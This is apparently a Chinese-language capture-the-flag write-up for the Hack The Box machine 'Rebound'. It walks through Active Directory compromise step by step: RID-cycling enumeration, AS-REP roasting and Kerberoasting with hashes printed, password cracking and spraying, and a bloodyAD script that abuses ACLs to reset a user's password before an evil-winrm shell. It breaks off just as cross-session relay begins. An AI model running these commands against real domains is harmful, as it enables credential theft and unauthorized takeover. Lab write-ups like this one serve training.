介绍

Rebound 是一台疯狂的 Windows 机器,具有棘手的 Active Directory 环境。通过 “RID cycling”进行的用户枚举揭示了一个 AS-REP-roastable 用户,其 TGT 用于 Kerberoast 另一个具有可破解密码的用户。 ACL 被滥用以获取对 OU 具有完全控制权限的组的访问权限,执行后代对象接管 (DOT),然后对具有 winrm 访问权限的用户进行 ShadowCredentials 攻击。在目标系统上,利用跨会话中继来获取登录用户的 NetNTLMv2 哈希值,一旦破解,就会导致 gMSA 密码被读取。最后,gMSA 帐户允许委派,但无需协议转换。基于资源的约束委派 (RBCD) 用于模拟域控制器,从而启用 DCSync 攻击,从而导致权限完全提升。

收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ sudo nmap -p- --min-rate 10000 10.10.11.231 -oN nmap/ports.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 10:58 EDT
Warning: 10.10.11.231 giving up on port because retransmission cap hit (10).
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.096s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49673/tcp open  unknown
49690/tcp open  unknown
49691/tcp open  unknown
49694/tcp open  unknown
49707/tcp open  unknown
49720/tcp open  unknown
49741/tcp open  unknown
49783/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 15.19 seconds

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ ports=$(cat nmap/ports.txt|grep open| awk -F "/" '{print $1}'|paste -sd ',')

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ sudo nmap -sT -sC -sV -O -p$ports 10.10.11.231 -oN nmap/details.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-11 10:59 EDT
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.085s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-11 15:05:29Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-09-11T15:06:44+00:00; +5m45s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49691/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49707/tcp open  msrpc         Microsoft Windows RPC
49720/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
49783/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2019 (96%), Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 2004 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-09-11T15:06:36
|_  start_date: N/A
|_clock-skew: mean: 5m44s, deviation: 0s, median: 5m44s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.44 seconds

将域名添加到/etc/hosts文件中;

1
sudo bash -c "echo '10.10.11.231 rebound.htb dc01.rebound.htb' >> /etc/hosts"

SMB

空密码可以访问两个文件夹,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ smbmap -H 10.10.11.231 -u null                

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.10.11.231:445        Name: rebound.htb               Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shared                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share

这两个文件夹皆为空

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ smbclient //10.10.11.231/IPC$ -N
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*
smb: \> exit
                                                                                                                    
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ smbclient //10.10.11.231/Shared -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug 25 17:46:36 2023
  ..                                  D        0  Fri Aug 25 17:46:36 2023

                4607743 blocks of size 4096. 1039160 blocks available
smb: \> exit

RPC

空密码可以连接

1
2
3
4
5
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ rpcclient -U "" -N 10.10.11.231
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED

NT_STATUS_ACCESS_DENIED 错误表示,由于 权限不足,服务器拒绝了该请求。具体来说,这意味着尝试枚举域用户时,所使用的账户没有足够的权限来执行该操作。

通过rid-cycling-attack手法枚举用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ lookupsid.py -no-pass 'guest@rebound.htb' 20000
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra
[*] Brute forcing SIDs at rebound.htb
[*] StringBinding ncacn_np:rebound.htb[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
5569: rebound\mmalone (SidTypeUser)
5680: rebound\nnoon (SidTypeUser)
7681: rebound\ldap_monitor (SidTypeUser)
7682: rebound\oorend (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7684: rebound\winrm_svc (SidTypeUser)
7685: rebound\batch_runner (SidTypeUser)
7686: rebound\tbrady (SidTypeUser)
7687: rebound\delegator$ (SidTypeUser)

将用户名收集在一个文件中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ cat sid_result.txt|grep SidTypeUser|grep -oP 'rebound.\K.*(?=\()' > username.txt

┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ cat username.txt                                                                
Administrator 
Guest 
krbtgt 
DC01$ 
ppaul 
llune 
fflock 
jjones 
mmalone 
nnoon 
ldap_monitor 
oorend 
winrm_svc 
batch_runner 
tbrady 
delegator$

立足

AS-REP-roastting

尝试”AS-REP-roastting”攻击,“不要求Kerberos预身份验证”在”jjones”用户上生效;返回了一个TGT;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ GetNPUsers.py -dc-ip 10.10.11.231 rebound.htb/ -usersfile username.txt
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User llune doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fflock doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$jjones@REBOUND.HTB:4c66ae7b7633af8f28c48084b200dedc$1bf2afd18bdfaf8b79bf4f257bc305fb42b25c8a4142ab2d10b8a3cd41cedf3b7064e45730f69c1b23ccf535e298b3694330fa395db591d75c3b3683fa2d797b2124ca8b97aad2ae6e52019f5cd7ef3dca64ac0ccb7a7a3a455bbde467c8a3c9cda41ca475ca43fa662e1ac73ef83adddbefda8a4c185092f8887ac87a53535eb3e4febfe1b4b1ecc2621219d2fad79d6cf842eb21929d47dee71f08d9a4f61649e7a052e08cfc878aea4208800bc98c44aac2e8cd6f914e63305f2e6a37922188e627c00a412c40e11c98d5ce6ecfc05b593150cc82e12b31b88153489e6782ca082da0127acd9c31fb
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User nnoon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ldap_monitor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oorend doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User winrm_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User batch_runner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User delegator$ doesn't have UF_DONT_REQUIRE_PREAUTH set

而然john和hashcat都无法破解出密码

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ john jjones.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 DONE (2024-09-11 11:41) 0g/s 1477Kp/s 1477Kc/s 1477KC/s  0841079575..*7¡Vamos!
Session completed. 
                                                                                                    
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ hashcat  -m 18200 jjones.hash /usr/share/wordlists/rockyou.txt
[SNIP]

Kerberoast

当拿到一个“不要求Kerberos预身份验证”的用户时,可以尝试Kerberoast 不带预身份验证

1
2
3
4
5
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ GetUserSPNs.py -no-preauth jjones -usersfile username.txt -dc-host 10.10.11.231 rebound.htb/ 
[SNIP]
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$ae249e49df17fddc5c790e16e8c3a3f4$0e96f83125e9e6f96f38a69e5e0e3d116d1d54965b900e211ebe077105cf5cb7c26871c34629fc331b4d5698d41c68b2afdd495b454fa80f3a773642e5e52bd5d2d5b321a3ef5c5b639c7a751f3b1e294310f8067696ff6ea04fe57465eb511f988ad2260865776498ee496a5aad8dca5d021d889d3dc82674b64a98a2f1083632bfa9551db5c539c8f4891e8fc019ab40eed0435549f329ddeb52811afbd2dcc70d5bba15828c0061ef914e6d1734ecb64a8206efd4acffb74c48ef78de374aadd88b35ac971bfa5cc3a28549bc43ed0719746856e8b6c3bf7c1781dd76688212c38d5aae9a020b7066300415f7b1d5bf816b830dacd7c2ab2a7c08a409aef9de39dc1da0d5e4c4a33aa32e0b9647cd2ba04a602676d6b8e8ed219f3658acd31ac4c5900f98c05f4decb648eb9a68aed59b6b079660848d706abea1a2f1d9fabc05a463e9da91e74b0fa0ba0b4f47fb5c1fe3531c35c33dd2dca4af79e974264488362b47f9a93f0c8ef07b31d329dcf13cc2a2eaa95c3b14043a8c76c54ff153acaf114259ae901862de0f325fa697101b768160d4f2aec42a1b8a869121cde74a4f70216201bee6ab097e91d4dfee03bf6554bf98f1956efa5b87acb8f0930274a84c12e4b80c30886f2ea48f31e63ecf65153267e5a29a86f9e8e2f1fe61465fb10986a0b5e1c20b504cbce218445e7311f31a6c5376de54b01a9bc96c3e19112915165910ec1327ac1c095280b6d3dda67fc0cb9336376bf1f575fa25c14c1c76372e1d5e03b8355275ba4aafb9d6eae4c18870ca561eb7a6669eca6bab0bdc632fcca98440e9a56e5371086289c06f22dca73bf5779e0826e546602fb518dde1681b05c57fcab6fdf8c453fac4ccb5c427815a79fc7104fd8b193644cf983cedf1f4f34b92c7e5179b852c983f807b83da3c73b4d327f41e8124bb7c482e0bec7b3a26eed116246176b820b171cab3410fe535cad9f573892408e0d04588d9a01f64f27e115e055875b23ee1dcd85731db11f789c41ef858c63cae65c9badee3b0b90e33b63052c042f0de35e8057ee8bf5f677c968d6b0a8dc16182c36cf2f8693b004be6e9960733936ff711f2140da1cbcbedc2d79ba980cdaf26cfe41f09d0387b8e7d4f49bb4462bab64eec8587bdb7502281e25788894690fb6e696ca21d1a51b56286816c3e39d124b4c8640172a3739b799ab785019034f89f93c243ef9ee13c1b915aef5402ef597c9753dc86a945764cb8bf467bdbe33597fb8202f3d066912e2645b366f8770aa3598dcadb780978de2508439114ae3a746e53dad92514022ad1d7dbe0d0a0645e38a15452d7b505d4c22f86af8cd60536ef55
[SNIP]

分别返回了krbtgt,DC01$,delegator$和ldap_monitor的ST;破解krbtgt和DC01$的ST不太现实,delegator$一看就是一台机器账户,如果机器账户设置了Laps,想去破解也几乎不太现实;但是”ldap_monitor”似乎是通过”jjones”用户注册的一个ldap服务账户

成功破解出ldap_monitor的密码

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ john ldap_monitor.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1GR8t@$$4u       (?)     
1g 0:00:00:05 DONE (2024-09-11 12:39) 0.1980g/s 2582Kp/s 2582Kc/s 2582KC/s 1Gobucs!..1DENA
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

ldap_monitor:1GR8t@$$4u凭据在SMB其效果,在winrm没有反应(猜测ldap_monitor不在远程管理组中),而且SMB服务枚举一番,并没有收获

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec smb 10.10.11.231  -u ldap_monitor  -p '1GR8t@$$4u'   
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u 
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec winrm 10.10.11.231  -u ldap_monitor  -p '1GR8t@$$4u'  
SMB         10.10.11.231    5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:rebound.htb)
HTTP        10.10.11.231    5985   DC01             [*] http://10.10.11.231:5985/wsman
WINRM       10.10.11.231    5985   DC01             [-] rebound.htb\ldap_monitor:1GR8t@$$4u
                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec smb 10.10.11.231  -u ldap_monitor  -p '1GR8t@$$4u'  --shares
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u 
SMB         10.10.11.231    445    DC01             [+] Enumerated shares
SMB         10.10.11.231    445    DC01             Share           Permissions     Remark
SMB         10.10.11.231    445    DC01             -----           -----------     ------
SMB         10.10.11.231    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.231    445    DC01             C$                              Default share
SMB         10.10.11.231    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.231    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.231    445    DC01             Shared          READ            
SMB         10.10.11.231    445    DC01             SYSVOL          READ            Logon server share

Password Spray

由于”1GR8t@$$4u”是一个服务账户的密码,尝试密码喷洒,密码在”oorend”用户上同样起效,但是仍然无法通过winrm拿到shell,smb也没有收获

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ crackmapexec smb 10.10.11.231  -u username.txt -p '1GR8t@$$4u'  --continue-on-success
SMB         10.10.11.231    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.231    445    DC01             [-] rebound.htb\Administrator:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\Guest:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\krbtgt:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\DC01$:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\ppaul:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\llune:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\fflock:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\jjones:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\mmalone:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\nnoon:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [+] rebound.htb\ldap_monitor:1GR8t@$$4u 
SMB         10.10.11.231    445    DC01             [+] rebound.htb\oorend:1GR8t@$$4u 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\winrm_svc:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\batch_runner:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\tbrady:1GR8t@$$4u STATUS_LOGON_FAILURE 
SMB         10.10.11.231    445    DC01             [-] rebound.htb\delegator$:1GR8t@$$4u STATUS_LOGON_FAILURE

滥用ACL

通过bloodhound来查看域内信息

1
2
sudo ntpdate -s rebound.htb 
bloodhound-python -u ldap_monitor -p '1GR8t@$$4u' -d rebound.htb -dc dc01.rebound.htb --zip -c Group,LocalAdmin,RDP,DCOM,Container,PSRemote,Session,Acl,Trusts,LoggedOn -ns 10.10.11.231

“oorend”对”servicemgmt”组有“self”权限,这意味着,”oorend”可以将自身添加到”servicemgmt”组中;

“servicemgmt”组对”service users”有着”genericall”权限;这意味着,我可以更改或添加”service users”OU的acl

“winrm_svc”在”service users”OU中,这意味着,我可以使得oorend用户对”service users”有完全控制权限,那么oorend就可以去修改”winrm_svc”用户的密码;

脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/bash

dcip=10.10.11.231

sudo ntpdate -s $dcip

echo "Getting oorend ticket"
impacket-getTGT rebound.htb/oorend:'1GR8t@$$4u'

export KRB5CCNAME=oorend.ccache

echo "Adding oorend to servicemgmt group"
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember ServiceMGMT oorend

echo "Writing dacl"
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' oorend

echo "Changing winrm_svc password"
bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password winrm_svc 'LeetPassword123!'
1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ bash poc.sh                                                                                                                                                                             
Getting oorend ticket
Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra

[*] Saving ticket in oorend.ccache
Adding oorend to servicemgmt group
[+] oorend added to ServiceMGMT
Writing dacl
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB
Changing winrm_svc password
[+] Password changed successfully!

成功修改”winrm_svc”用户的密码之后,我就可以用”LeetPassword123!”密码通过winrm连接,因为”winrm_svc”属于”remote management users”组中,这一点可以在bloodhound中看到;

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/htb/machines/windows/Rebound]
└─$ evil-winrm -i 10.10.11.231 -u winrm_svc -p 'LeetPassword123!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
rebound\winrm_svc

提权

Cross-session

虽然拿下winrm_svc,仍然不能利用”CanPSRemote”到域控机器,因为这个利用手法是需要凭据的,可以从CanPSRemote了解到

正在运行的进程,有一些有趣的事情,session 1 中有一堆进程。通常在 HTB 计算机上,当没有人登录时,我会看到LogonUI和其他几个进程,但这里explorer正在运行,而且看起来有人确实登录了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    395      33    12696      21332              2828   0 certsrv
    480      19     2244       5492               392   0 csrss
    274      16     2228       5300               504   1 csrss
    357      15     3476      15000              5868   1 ctfmon
    401      33    16376      25236              2928   0 dfsrs
    189      13     2388       8204              1836   0 dfssvc
    290      14     3848      13808              3876   0 dllhost
   5374    4793    69020      71240              2968   0 dns
    601      25    24480      52216                60   1 dwm
   1505      59    25076      89616              5312   1 explorer
     53       6     1788       5444              2804   1 fontdrvhost
     53       6     1504       4728              2812   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    142      14     2224       6096              2984   0 ismserv
   2390     188    55980      74420               656   0 lsass
    492      36    52016      64604              2836   0 Microsoft.ActiveDirectory.WebServices
    254      13     2912      10840              4152   0 msdtc
    646      92   305660     323116              2504   0 MsMpEng
    110       7     1276       6892              1692   1 PickerHost
    158      10     1612       8700              6676   1 PickerHost
      0      14      320      21272                88   0 Registry
    235      12     2704      17160              2588   1 RuntimeBroker
    293      15     5656      17056              6192   1 RuntimeBroker
    231      12     2320      12932              6572   1 RuntimeBroker
    672      32    19596      72168              5660   1 SearchUI
    276      12     2836      12528              2172   0 SecurityHealthService
    628      14     5668      13520               636   0 services
    783      30    16972      60172              2524   1 ShellExperienceHost
    454      17     5080      25200              5544   1 sihost
     53       3      528       1228               288   0 smss
    329      15     5312      13996               332   0 svchost
    209      12     1672       7540               488   0 svchost
    158       9     1864       7000               508   0 svchost
    137      17     3440       7812               768   0 svchost
     89       5      904       4012               848   0 svchost
    215      12     1972      10132               864   0 svchost
    939      21     6980      23168               868   0 svchost
    918      20     5320      13128               916   0 svchost
    257      10     2004       7952               956   0 svchost

Session ID(会话标识符) 是 Windows 操作系统中为每个用户会话分配的唯一标识符;每个用户在登录时都会分配一个会话 ID,Windows 会区分每个登录用户的会话,并隔离每个用户的进程。0 表示的是 Session 0,通常表示与系统服务相关的进程,因为系统服务通常在会话 0 中运行,而普通用户的交互式进程则在不同的会话中。

qwinsta显示有关会话主机的信息的命令,但它失败;遇到了这篇 Security Stack Exchange 帖子,它没有解释原因,但表明RunasCs.exe可以使其工作;

1
2
3
4
5
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> .\RunasCs.exe oorend '1GR8t@$$4u' -l 9 "qwinsta"

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 console           tbrady                    1  Active

显示 TBrady 用户已登录;

使用runasCs和KrbRelay的组合,可以强制来自tbrady的连接,这将生成hash。为此,通过-ntlm指定NTLM身份验证,通过-session指定session号,并为具有正确权限的有效RPC服务指定CLSID,从README上列出的默认值中选择

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
